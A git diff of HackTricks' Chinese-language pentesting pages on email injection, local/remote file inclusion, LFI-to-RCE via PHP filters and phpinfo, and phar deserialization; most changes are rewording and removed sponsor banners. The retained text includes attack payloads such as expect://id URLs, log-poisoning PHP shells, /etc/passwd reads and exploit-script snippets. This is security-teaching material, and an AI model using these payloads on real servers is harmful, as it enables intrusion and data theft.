 - Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
 - 注意使用下划线作为分隔地址的空格
 - 它将把验证邮件发送到 `collab@psres.net`
-- Punycode: 使用 Punycode 可以在 Joomla 中注入一个标签 `)
 
-## Third party SSO
+## 第三方 SSO
 
 ### XSS
 
-一些服务如 **github** 或 **salesforce 允许** 您创建一个 **带有 XSS 负载的电子邮件地址**。如果您可以 **使用这些提供商登录其他服务**,而这些服务 **没有正确清理** 电子邮件,您可能会导致 **XSS**。
+一些服务如 **github** 或 **salesforce 允许** 您创建一个 **带有 XSS 有效载荷的电子邮件地址**。如果您可以 **使用这些提供商登录其他服务**,而这些服务 **没有正确清理** 电子邮件,您可能会导致 **XSS**。
 
-### Account-Takeover
+### 账户接管
 
-如果一个 **SSO 服务** 允许您 **创建一个不验证给定电子邮件地址的账户**(如 **salesforce**),然后您可以使用该账户 **登录到一个信任** salesforce 的不同服务,您可能会访问任何账户。\
+如果 **SSO 服务** 允许您 **创建一个不验证给定电子邮件地址的账户**(如 **salesforce**),然后您可以使用该账户 **登录到一个信任** salesforce 的不同服务,您可能会访问任何账户。\
 &#xNAN;_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
 
-## Reply-To
+## 回复至
 
 您可以使用 _**From: company.com**_ 和 _**Replay-To: attacker.com**_ 发送电子邮件,如果由于电子邮件是 **从** 内部地址发送的而发送了任何 **自动回复**,则 **攻击者** 可能能够 **接收** 该 **响应**。
 
-## Hard Bounce Rate
+## 硬退信率
 
-某些服务,如 AWS,实施一个称为 **Hard Bounce Rate** 的阈值,通常设置为 10%。这是一个关键指标,尤其对于电子邮件投递服务。当超过此比率时,服务(如 AWS 的电子邮件服务)可能会被暂停或阻止。
+某些服务,如 AWS,实施一个称为 **硬退信率** 的阈值,通常设置为 10%。这是一个关键指标,尤其对于电子邮件投递服务。当超过此比率时,服务(如 AWS 的电子邮件服务)可能会被暂停或阻止。
 
-**hard bounce** 指的是 **电子邮件** 被退回给发件人,因为收件人的地址无效或不存在。这可能由于多种原因发生,例如 **电子邮件** 被发送到不存在的地址、一个不真实的域名,或收件服务器拒绝接受 **电子邮件**。
+**硬退信** 是指 **电子邮件** 被退回给发件人,因为收件人的地址无效或不存在。这可能由于多种原因发生,例如 **电子邮件** 被发送到不存在的地址、一个不真实的域名,或收件服务器拒绝接受 **电子邮件**。
 
-在 AWS 的上下文中,如果您发送 1000 封电子邮件,其中 100 封导致硬退回(由于无效地址或域名等原因),这将意味着 10% 的硬退回率。达到或超过此比率可能会触发 AWS SES(简单电子邮件服务)阻止或暂停您的电子邮件发送能力。
+在 AWS 的上下文中,如果您发送 1000 封电子邮件,其中 100 封导致硬退信(由于无效地址或域名等原因),这将意味着 10% 的硬退信率。达到或超过此比率可能会触发 AWS SES(简单电子邮件服务)阻止或暂停您的电子邮件发送能力。
 
-保持低硬退回率对于确保不间断的电子邮件服务和维护发件人声誉至关重要。监控和管理您的邮件列表中电子邮件地址的质量可以显著帮助实现这一目标。
+保持低硬退信率对于确保不间断的电子邮件服务和维护发件人声誉至关重要。监控和管理您的邮件列表中电子邮件地址的质量可以显著帮助实现这一目标。
 
-有关更详细的信息,可以参考 AWS 关于处理退回和投诉的官方文档 [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)。
+有关更详细的信息,可以参考 AWS 关于处理退信和投诉的官方文档 [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)。
 
-## References
+## 参考
 
 - [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
 - [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
@@ -199,11 +191,3 @@ Payloads:
 - [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0)
 
 {{#include ../banners/hacktricks-training.md}}
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index 846464777..8e6b9f403 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -2,31 +2,16 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金发布和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
-
 ## 文件包含
 
-**远程文件包含 (RFI):** 文件从远程服务器加载(最佳:您可以编写代码,服务器将执行它)。在 php 中,默认情况下是 **禁用** 的 (**allow_url_include**)。\
-**本地文件包含 (LFI):** 服务器加载本地文件。
+**远程文件包含 (RFI):** 文件从远程服务器加载(最佳:您可以编写代码,服务器将执行它)。在 php 中,这个功能默认是 **禁用** 的 (**allow_url_include**)。\
+**本地文件包含 (LFI):** 服务器加载本地文件。
 
 当用户以某种方式控制将要被服务器加载的文件时,就会发生漏洞。
 
-易受攻击的 **PHP 函数**:require, require_once, include, include_once
+易受攻击的 **PHP 函数**: require, require_once, include, include_once
 
-一个有趣的工具来利用这个漏洞:[https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
+一个有趣的工具来利用这个漏洞: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
 
 ## Blind - Interesting - LFI2RCE 文件
 ```python
@@ -60,7 +45,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 
 ## 基本 LFI 和绕过
 
-所有示例都是针对本地文件包含的,但也可以应用于远程文件包含(页面=[http://myserver.com/phpshellcode.txt\\](.`)。要获取 **所有支持的编码** 列表,请在控制台中运行:`iconv -l`
+- `convert.iconv.*` : 转换为不同的编码(`convert.iconv..`)。要获取 **所有支持的编码列表**,请在控制台中运行:`iconv -l`
 
 > [!WARNING]
-> 滥用 `convert.iconv.*` 转换过滤器可以 **生成任意文本**,这可能对编写任意文本或使函数如 include 处理任意文本有用。有关更多信息,请查看 [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)。
+> 滥用 `convert.iconv.*` 转换过滤器可以 **生成任意文本**,这可能对写入任意文本或使函数如 include 处理任意文本有用。有关更多信息,请查看 [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)。
 
 - [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
 - `zlib.deflate`: 压缩内容(如果提取大量信息时很有用)
@@ -284,25 +269,25 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
 
 ### 使用 php 过滤器作为 oracle 读取任意文件
 
-[**在这篇文章中**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) 提出了一种在不从服务器返回输出的情况下读取本地文件的技术。该技术基于使用 php 过滤器作为 oracle 的 **布尔外泄文件(逐字符)**。这是因为 php 过滤器可以用来使文本变得足够大,从而使 php 抛出异常。
+[**在这篇文章中**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) 提出了一种在不从服务器返回输出的情况下读取本地文件的技术。该技术基于使用 php 过滤器作为 oracle 的 **布尔文件外泄(逐字符)**。这是因为 php 过滤器可以用来使文本变得足够大,从而使 php 抛出异常。
 
 在原始文章中可以找到该技术的详细解释,但这里是一个快速总结:
 
 - 使用编码 **`UCS-4LE`** 将文本的前导字符留在开头,并使字符串的大小呈指数级增长。
-- 这将用于生成一个 **当初始字母正确猜测时变得如此庞大的文本**,以至于 php 会触发一个 **错误**。
+- 这将用于生成一个 **当初始字母正确猜测时非常大的文本**,以至于 php 会触发一个 **错误**。
 - **dechunk** 过滤器将 **删除所有内容,如果第一个字符不是十六进制**,因此我们可以知道第一个字符是否是十六进制。
-- 这与前一个(以及其他根据猜测字母的过滤器)结合,将允许我们通过查看何时进行足够的转换使其不再是十六进制字符来猜测文本开头的字母。因为如果是十六进制,dechunk 不会删除它,初始炸弹将导致 php 错误。
+- 这与前一个(以及根据猜测字母的其他过滤器)结合,将允许我们通过查看何时进行足够的转换使其不再是十六进制字符来猜测文本开头的字母。因为如果是十六进制,dechunk 不会删除它,初始炸弹将导致 php 错误。
 - 编码 **convert.iconv.UNICODE.CP930** 将每个字母转换为下一个字母(因此在此编码后:a -> b)。这使我们能够发现第一个字母是否是 `a`,例如,因为如果我们应用 6 次此编码 a->b->c->d->e->f->g,该字母不再是十六进制字符,因此 dechunk 不会删除它,php 错误被触发,因为它与初始炸弹相乘。
 - 使用其他转换如 **rot13** 在开头可以泄露其他字符如 n, o, p, q, r(其他编码可以用于将其他字母移动到十六进制范围)。
 - 当初始字符是数字时,需要对其进行 base64 编码并泄露前两个字母以泄露该数字。
-- 最后一个问题是查看 **如何泄露超过初始字母**。通过使用有序内存过滤器如 **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** 可以改变字符的顺序,并在文本的第一位置获取其他字母。
+- 最后一个问题是查看 **如何泄露超过初始字母**。通过使用有序内存过滤器如 **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** 可以改变字符的顺序,并在文本的首位获取其他字母。
 - 为了能够获取 **更多数据**,想法是 **在开头生成 2 字节的垃圾数据**,使用 **convert.iconv.UTF16.UTF16**,应用 **UCS-4LE** 使其 **与接下来的 2 字节进行枢轴**,并 **删除数据直到垃圾数据**(这将删除初始文本的前 2 字节)。继续这样做,直到达到所需的泄露位。
 
 在文章中还泄露了一种自动执行此操作的工具:[php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit)。
 
 ### php://fd
 
-此包装器允许访问进程打开的文件描述符。可能对外泄打开文件的内容有用:
+此包装器允许访问进程打开的文件描述符。可能对外泄打开文件的内容非常有用:
 ```php
 echo file_get_contents("php://fd/3");
 $myfile = fopen("/etc/passwd", "r");
@@ -341,7 +326,7 @@ NOTE: the payload is ""
 
 ### expect://
 
-必须激活 Expect。您可以使用此方法执行代码:
+必须激活 Expect。您可以使用以下方式执行代码:
 ```
 http://example.com/index.php?page=expect://id
 http://example.com/index.php?page=expect://ls
@@ -367,9 +352,9 @@ $phar->stopBuffering();
 ```bash
 php --define phar.readonly=0 create_path.php
 ```
-执行后,将创建一个名为 `test.phar` 的文件,这可能被利用来利用本地文件包含(LFI)漏洞。
+执行后,将创建一个名为 `test.phar` 的文件,这可能会被利用来利用本地文件包含(LFI)漏洞。
 
-在 LFI 仅执行文件读取而不执行其中的 PHP 代码的情况下,通过 `file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()` 或 `filesize()` 等函数,可以尝试利用反序列化漏洞。此漏洞与使用 `phar` 协议读取文件相关。
+在 LFI 仅执行文件读取而不执行其中的 PHP 代码的情况下,通过 `file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()` 或 `filesize()` 等函数,可以尝试利用反序列化漏洞。此漏洞与使用 `phar` 协议读取文件有关。
 
 有关在 `.phar` 文件上下文中利用反序列化漏洞的详细理解,请参阅下面链接的文档:
 
@@ -381,13 +366,13 @@ phar-deserialization.md
 
 ### CVE-2024-2961
 
-可以滥用 **任何支持 PHP 过滤器的任意文件读取** 来获得 RCE。详细描述可以在 [**此帖子中找到**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
+可以滥用 **任何支持 php 过滤器的 PHP 中的任意文件读取** 来获得 RCE。详细描述可以在 [**此帖子中找到**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
 非常简要的总结:在 PHP 堆中滥用 **3 字节溢出** 来 **更改特定大小的空闲块链**,以便能够 **在任何地址写入任何内容**,因此添加了一个钩子来调用 **`system`**。\
-可以通过滥用更多 PHP 过滤器来分配特定大小的块。
+可以通过滥用更多的 php 过滤器来分配特定大小的块。
 
 ### 更多协议
 
-查看更多可能的 [**协议以包含在此**](https://www.php.net/manual/en/wrappers.php)**:**
+查看更多可能的 [**协议以包含在这里**](https://www.php.net/manual/en/wrappers.php)**:**
 
 - [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — 在内存或临时文件中写入(不确定这在文件包含攻击中如何有用)
 - [file://](https://www.php.net/manual/en/wrappers.file.php) — 访问本地文件系统
@@ -400,7 +385,7 @@ phar-deserialization.md
 
 ## 通过 PHP 的 'assert' 进行 LFI
 
-在处理 'assert' 函数时,PHP 中的本地文件包含(LFI)风险显著较高,因为它可以在字符串中执行代码。如果输入包含目录遍历字符如 ".." 被检查但未正确清理,这尤其成问题。
+在处理 'assert' 函数时,PHP 中的本地文件包含(LFI)风险显著较高,因为它可以执行字符串中的代码。如果输入包含像 ".." 这样的目录遍历字符被检查但未正确清理,这尤其成问题。
 
 例如,PHP 代码可能被设计为防止目录遍历,如下所示:
 ```bash
@@ -416,33 +401,18 @@ assert("strpos('$file', '..') === false") or die("");
 ```
 重要的是要**对这些有效负载进行URL编码**。
 
-

-
-加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金发布和重要平台更新
-
-**加入我们在** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
-
 ## PHP盲路径遍历
 
 > [!WARNING]
 > 该技术适用于您**控制**一个**PHP函数**的**文件路径**的情况,该函数将**访问一个文件**但您看不到文件的内容(如简单调用**`file()`**),但内容不会显示。
 
-在[**这篇精彩的文章**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)中解释了如何通过PHP过滤器滥用盲路径遍历以**通过错误oracle提取文件内容**。
+在[**这篇令人难以置信的文章**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)中解释了如何通过PHP过滤器滥用盲路径遍历以**通过错误oracle提取文件内容**。
 
 总之,该技术使用**"UCS-4LE"编码**使文件内容变得如此**庞大**,以至于**打开**该文件的**PHP函数**将触发一个**错误**。
 
-然后,为了泄露第一个字符,使用过滤器**`dechunk`**,以及其他如**base64**或**rot13**,最后使用过滤器**convert.iconv.UCS-4.UCS-4LE**和**convert.iconv.UTF16.UTF-16BE**来**在开头放置其他字符并泄露它们**。
+然后,为了泄露第一个字符,过滤器**`dechunk`**与其他过滤器如**base64**或**rot13**一起使用,最后使用过滤器**convert.iconv.UCS-4.UCS-4LE**和**convert.iconv.UTF16.UTF-16BE**来**在开头放置其他字符并泄露它们**。
 
-**可能存在漏洞的函数**:`file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (仅限目标只读)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
+**可能存在漏洞的函数**:`file_get_contents`,`readfile`,`finfo->file`,`getimagesize`,`md5_file`,`sha1_file`,`hash_file`,`file`,`parse_ini_file`,`copy`,`file_put_contents (仅限目标只读)`,`stream_get_contents`,`fgets`,`fread`,`fgetc`,`fgetcsv`,`fpassthru`,`fputs`
 
 有关技术细节,请查看上述文章!
 
@@ -454,14 +424,14 @@ assert("strpos('$file', '..') === false") or die("");
 
 ### 通过Apache/Nginx日志文件
 
-如果Apache或Nginx服务器在包含函数中**易受LFI攻击**,您可以尝试访问**`/var/log/apache2/access.log`或`/var/log/nginx/access.log`**,在**用户代理**或**GET参数**中设置一个php shell,如**``**并包含该文件。
+如果Apache或Nginx服务器在包含函数内部**易受LFI攻击**,您可以尝试访问**`/var/log/apache2/access.log`或`/var/log/nginx/access.log`**,在**用户代理**或**GET参数**中设置一个php shell,如**``**并包含该文件。
 
 > [!WARNING]
-> 请注意,如果您为shell使用双引号而不是**单引号**,双引号将被修改为字符串"_**quote;**_",**PHP将在那里抛出错误**,并且**不会执行其他任何内容**。
+> 请注意,**如果您使用双引号**而不是**单引号**来表示shell,双引号将被修改为字符串"_**quote;**_",**PHP将在那里抛出一个错误**,并且**不会执行其他任何内容**。
 >
-> 此外,请确保**正确编写有效负载**,否则每次尝试加载日志文件时PHP都会出错,您将没有第二次机会。
+> 此外,请确保**正确编写有效负载**,否则每次PHP尝试加载日志文件时都会出错,您将没有第二次机会。
 
-这也可以在其他日志中完成,但**请小心,**日志中的代码可能会被URL编码,这可能会破坏Shell。头部**授权 "basic"**包含"用户:密码"的Base64编码,并在日志中解码。PHPShell可以插入到此头部中。\
+这也可以在其他日志中完成,但**请小心,**日志中的代码可能会被URL编码,这可能会破坏Shell。头部**授权 "basic"**包含Base64中的"user:password",并在日志中解码。PHPShell可以插入到此头部中。\
 其他可能的日志路径:
 ```python
 /var/log/apache2/access.log
@@ -482,7 +452,7 @@ assert("strpos('$file', '..') === false") or die("");
 
 ### 通过 /proc/\*/fd/\*
 
-1. 上传大量的 shell(例如:100)
+1. 上传大量 shell(例如:100)
 2. 包含 [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD),其中 $PID = 进程的 PID(可以暴力破解),$FD 是文件描述符(也可以暴力破解)
 
 ### 通过 /proc/self/environ
@@ -545,9 +515,9 @@ http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=da
 
 NOTE: the payload is ""
 ```
-### 通过 php 过滤器(无需文件)
+### 通过 php 过滤器(不需要文件)
 
-这个 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了你可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着你可以 **生成任意 php 代码** 进行包含 **而无需将其写入** 文件。
+这个 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了你可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着你可以 **生成任意 php 代码** 进行包含 **而不需要将其写入** 文件。
 
 {{#ref}}
 lfi2rce-via-php-filters.md
@@ -640,19 +610,4 @@ lfi2rce-via-eternal-waiting.md
 
 {% file src="../../images/EN-Local-File-Inclusion-1.pdf" %}
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客洞察**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-及时了解最新的漏洞赏金计划和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧!
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
index b2be0ef9b..7e9e03911 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
@@ -2,42 +2,36 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

+## Intro
 
-深化您在 **移动安全** 方面的专业知识,加入 8kSec Academy。通过我们的自学课程掌握 iOS 和 Android 安全,并获得认证:
+这篇 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了你可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着你可以 **生成任意的 php 代码** 进行包含 **而无需将其写入** 文件中。
 
-{% embed url="https://academy.8ksec.io/" %}
-
-## 介绍
-
-这个 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了您可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着您可以 **生成任意 php 代码** 以供包含 **而无需将其写入** 文件。
-
-基本上,脚本的目标是在文件的 **开头** 生成一个 Base64 字符串,该字符串将被 **最终解码**,提供所需的有效负载,该有效负载将被 **`include` 解释**。
+基本上,脚本的目标是在文件的 **开头** 生成一个 **Base64** 字符串,最终将被 **解码**,提供所需的有效载荷,**将被 `include` 解释**。
 
 实现这一目标的基础是:
 
 - `convert.iconv.UTF8.CSISO2022KR` 将始终在字符串前添加 `\x1b$)C`
-- `convert.base64-decode` 对无效的 base64 字符极其宽容。它基本上会忽略任何无效的 base64 字符。如果它发现意外的 "=",会出现一些问题,但可以通过 `convert.iconv.UTF8.UTF7` 过滤器删除这些字符。
+- `convert.base64-decode` 对无效的 base64 字符极其宽容。它基本上会忽略任何无效的 base64 字符。如果遇到意外的 "=" 会有一些问题,但可以通过 `convert.iconv.UTF8.UTF7` 过滤器去除。
 
 生成任意内容的循环是:
 
-1. 按照上述描述将 `\x1b$)C` 添加到我们的字符串前面
+1. 按照上述描述在我们的字符串前添加 `\x1b$)C`
 2. 应用一些 iconv 转换链,使我们的初始 base64 保持不变,并将我们刚刚添加的部分转换为只有下一个部分的有效 base64 字符的字符串
-3. 对字符串进行 base64 解码和 base64 编码,这将删除中间的任何垃圾
+3. 对字符串进行 base64 解码和再编码,这将去除中间的任何垃圾
 4. 如果我们想构造的 base64 还没有完成,则返回到第 1 步
 5. 进行 base64 解码以获取我们的 php 代码
 
 > [!WARNING]
-> **包含** 通常会在文件末尾 **附加 ".php"**,这可能会使利用变得困难,因为您需要找到一个内容不会破坏利用的 .php 文件……或者您 **可以直接使用 `php://temp` 作为资源**,因为它可以 **在名称中附加任何内容**(例如 +".php"),并且仍然允许利用工作!
+> **包含** 通常会做一些事情,比如 **在文件末尾附加 ".php"**,这可能会使利用变得困难,因为你需要找到一个内容不会破坏利用的 .php 文件……或者你 **可以直接使用 `php://temp` 作为资源**,因为它可以 **在名称中附加任何内容**(例如 +".php"),并且仍然允许利用工作!
 
 ## 如何将后缀添加到结果数据
 
-[**这篇写作解释了**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) 您如何仍然可以滥用 PHP 过滤器为结果字符串添加后缀。如果您需要输出具有某种特定格式(如 json 或许添加一些 PNG 魔术字节),这非常好。
+[**这篇写作解释了**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) 如何仍然滥用 PHP 过滤器为结果字符串添加后缀。这在你需要输出具有特定格式(如 json 或许添加一些 PNG 魔术字节)时非常有用。
 
 ## 自动工具
 
 - [https://github.com/synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator)
-- [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **(可以添加后缀)**
+- [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **(可以添加后缀)**
 
 ## 完整脚本
 ```python
@@ -170,7 +164,7 @@ conversions = {
 '=': ''
 }
 ```
-这里是**脚本**,用于获取生成每个 b64 字母的编码:
+这里是获取生成每个 b64 字母的编码的 **脚本**:
 ```php
 

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
index 12a48b358..920d05219 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -1,20 +1,12 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用程序、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
-要利用此漏洞,您需要:**一个LFI漏洞,一个显示phpinfo()的页面,“file_uploads = on”,并且服务器必须能够在“/tmp”目录中写入。**
+要利用此漏洞,您需要:**一个 LFI 漏洞,一个显示 phpinfo() 的页面,"file_uploads = on",并且服务器必须能够在 "/tmp" 目录中写入。**
 
 [https://www.insomniasec.com/downloads/publications/phpinfolfi.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
 
 **教程 HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
 
-您需要修复漏洞(将**=>**更改为**=>**)。为此,您可以执行:
+您需要修复漏洞(将 **=>** 更改为 **=>**)。为此,您可以执行:
 ```
 sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py
 ```
@@ -26,15 +18,15 @@ sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py
 
 如果在PHP中允许上传文件,并且你尝试上传一个文件,这个文件会存储在一个临时目录中,直到服务器处理完请求,然后这个临时文件会被删除。
 
-然后,如果你在web服务器中发现了LFI漏洞,你可以尝试猜测创建的临时文件的名称,并通过在文件被删除之前访问临时文件来利用RCE。
+然后,如果你在web服务器中发现了LFI漏洞,你可以尝试猜测创建的临时文件的名称,并在文件被删除之前通过访问临时文件来利用RCE。
 
 在**Windows**中,文件通常存储在**C:\Windows\temp\php**
 
-在**linux**中,文件的名称通常是**随机的**,位于**/tmp**。由于名称是随机的,需要**从某处提取临时文件的名称**并在文件被删除之前访问它。这可以通过读取函数“**phpconfig()**”内部的**变量$\_FILES**的值来完成。
+在**linux**中,文件的名称通常是**随机的**,并位于**/tmp**。由于名称是随机的,需要**从某处提取临时文件的名称**并在文件被删除之前访问它。这可以通过读取函数“**phpconfig()**”内部的**变量$\_FILES**的值来完成。
 
 **phpinfo()**
 
-**PHP**使用**4096B**的缓冲区,当它**满**时,它会被**发送到客户端**。然后客户端可以**发送****大量的大请求**(使用大头部)**上传一个php**反向**shell**,等待**phpinfo()的第一部分返回**(其中包含临时文件的名称),并尝试在php服务器删除文件之前访问临时文件,利用LFI漏洞。
+**PHP**使用**4096B**的缓冲区,当它**满**时,它会被**发送到客户端**。然后客户端可以**发送****大量的大请求**(使用大头部)**上传一个php**反向**shell**,等待**phpinfo()的第一部分被返回**(其中包含临时文件的名称),并尝试在php服务器删除文件之前**访问临时文件**,利用LFI漏洞。
 
 **Python脚本尝试暴力破解名称(如果长度=6)**
 ```python
@@ -58,12 +50,4 @@ sys.exit(0)
 
 print('[x] Something went wrong, please try again')
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md
index bdce1c614..ec5ad41d2 100644
--- a/src/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/src/pentesting-web/file-inclusion/phar-deserialization.md
@@ -2,17 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

+**Phar** 文件(PHP Archive)**包含序列化格式的元数据**,因此,当解析时,这个**元数据**会被**反序列化**,你可以尝试利用**反序列化**漏洞在**PHP**代码中。
 
-**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
+这个特性的最佳之处在于,即使使用不执行PHP代码的PHP函数,如**file_get_contents()、fopen()、file()或file_exists()、md5_file()、filemtime()或filesize()**,也会发生这种反序列化。
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
-**Phar** 文件(PHP Archive)文件 **包含序列化格式的元数据**,因此,当解析时,这个 **元数据** 会被 **反序列化**,你可以尝试利用 **反序列化** 漏洞在 **PHP** 代码中。
-
-这个特性的最佳之处在于,即使使用不执行 PHP 代码的 PHP 函数,如 **file_get_contents()、fopen()、file() 或 file_exists()、md5_file()、filemtime() 或 filesize()**,也会发生这种反序列化。
-
-所以,想象一个情况,你可以让一个 PHP 网站使用 **`phar://`** 协议获取任意文件的大小,并且在代码中你发现一个类似于以下的 **类**:
+所以,想象一个情况,你可以让一个PHP网页使用**`phar://`**协议获取任意文件的大小,并且在代码中你发现一个类似于以下的**类**:
 ```php:vunl.php
 stopBuffering();
 ```bash
 php --define phar.readonly=0 create_phar.php
 ```
-并执行 `whoami` 命令,利用易受攻击的代码:
+并利用易受攻击的代码执行 `whoami` 命令:
 ```bash
 php vuln.php
 ```
@@ -67,10 +61,6 @@ php vuln.php
 
 {% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
 
-

